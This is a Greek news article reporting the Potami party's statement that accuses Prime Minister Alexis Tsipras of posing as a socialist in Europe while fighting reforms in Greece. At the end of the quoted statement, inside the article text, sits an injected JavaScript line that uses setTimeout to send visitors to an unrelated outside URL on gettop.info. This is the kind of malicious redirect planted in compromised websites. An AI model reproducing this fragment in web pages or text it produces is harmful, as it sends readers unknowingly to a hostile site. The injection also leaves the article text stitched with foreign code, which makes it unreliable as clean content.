Ποτάμι: Ο Τσίπρας το παίζει σοσιαλιστής στην Ευρώπη και εκσυγχρονιστής στην Ελλάδα

0
4

 

Σκληρή κριτική στον πρωθυπουργό Αλέξη Τσίπρα ότι επιμένει στην Ευρώπη να το παίζει σοσιαλιστής και στην Ελλάδα να μάχεται τον εκσυγχρονισμό και τις μεταρρυθμίσεις, ασκεί το Ποτάμι με αφορμή την ευρωμεσογειακή Σύνοδο.

Το Ποτάμι προειδοποιεί τον πρωθυπουργό πως οι συμμαχίες απαιτούν σχέδιο, κοινούς στόχους, συνέπεια στον ευρωπαϊκό προσανατολισμό,ενώ τον κατηγορεί για διπροσωπία λέγοντας πως «στην Ευρώπη το παίζει σοσιαλιστής και στην Ελλάδα μάχεται τον εκσυγχρονισμό και τις μεταρρυθμίσεις».

Αναλυτικά η δήλωση:

«Ο κ. Τσίπρας αραίωσε τις παλιές παρέες με αυτούς που θέλουν να γκρεμίσουν την Ευρώπη κι αποφάσισε να φορέσει σοσιαλιστικό κοστούμι για να καθίσει δίπλα με εκείνους που μέχρι χθες λοιδορούσε. Ας είναι, αν πρόκειται να βγει κάτι καλό για τη χώρα.

Οφείλει να ξέρει όμως, ότι οι συμμαχίες απαιτούν σχέδιο, κοινούς στόχους, συνέπεια στον ευρωπαϊκό προσανατολισμό, εμπιστοσύνη.

Πράγματα άγνωστα για τον κ. Τσίπρα που επιμένει στην Ευρώπη να το παίζει σοσιαλιστής και στην Ελλάδα να μάχεται τον εκσυγχρονισμό και τις μεταρρυθμίσεις. Η Ευρώπη πρέπει να αλλάξει με πρωταγωνιστές τις δυνάμεις που βλέπουν τα αδιέξοδα αλλά δεν θέλουν να γυρίσουν στον παρελθόν των «κλειστών κρατών». Οι αντιευρωπαϊστές και λαϊκιστές δεν είναι σύμμαχοι μας.

Το Ποτάμι – με τους ευρωβουλευτές του να συνεργάζονται στην Ομάδα των Σοσιαλιστών και Δημοκρατών – παλεύει συνεχώς με τις μικρές δυνάμεις του, για μια άλλη πολιτική που θα βοηθάει την ανάπτυξη, θα αντιμετωπίζει τα κοινωνικά προβλήματα, θα μειώνει τις αντιθέσεις, θα οδηγεί στην ευρωπαϊκή ενοποίηση». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here